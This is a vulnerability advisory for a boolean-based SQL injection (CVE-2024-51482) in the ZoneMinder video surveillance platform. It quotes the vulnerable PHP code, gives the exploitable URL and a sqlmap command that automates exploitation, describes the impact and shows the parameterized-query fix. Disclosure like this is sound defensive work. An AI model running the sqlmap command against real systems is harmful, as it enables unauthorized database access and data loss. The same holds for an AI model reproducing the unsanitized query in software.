ZoneMinder开源视频监控平台SQL注入漏洞(CVE-2024-51482)

Boolean-based SQL Injection in ZoneMinder v1.37.\* <= 1.37.64 ============================================================= Critical [connortechnology](https://github.com/connortechnology) published GHSA-qm8h-3xvf-m7j3 5 days ago Package ------- zoneminder (apt, ppa, aur) Affected versions ----------------- 1.37.\*<=1.37.64 Patched versions ---------------- 1.37.65 Description ----------- ### Summary ZoneMinder v1.37.\* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of **web/ajax/event.php**. ### Details In **web/ajax/event.php**, I found the vulnerable code: case 'removetag' : $tagId = $_REQUEST['tid']; dbQuery('DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?', array($tagId, $_REQUEST['id'])); $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId"; $rowCount = dbNumRows($sql); if ($rowCount < 1) { $sql = 'DELETE FROM Tags WHERE Id = ?'; $values = array($_REQUEST['tid']); $response = dbNumRows($sql, $values); ajaxResponse(array('response'=>$response)); } Notice that **$tagId** is put directly inside **$sql** command and then execute. So we can confirm it is vulnerable to SQL Injection. ### PoC Although it is not possible to execute the command directly through directory, after reading the documents, here is the url: http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1 and the function tid is vulnerable to SQL Injection. I used sqlmap to automate the exploitation process through this command: sqlmap -u 'http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1' Here is the PoC video: [https://github.com/user-attachments/assets/3cc50e51-68cf-4540-8225-4288f73e0c08](https://github.com/user-attachments/assets/3cc50e51-68cf-4540-8225-4288f73e0c08) ### Impact Total control of SQL Databases: loss of data confidentiality and integrity, denial of service with SLEEP command. ### Mitigation Here is the code modification to patch the vulnerability: $sql = "SELECT * FROM Events_Tags WHERE TagId = ?"; $rowCount = dbNumRows($sql, $tagId); The code update the parameterized query through the vulnerable component.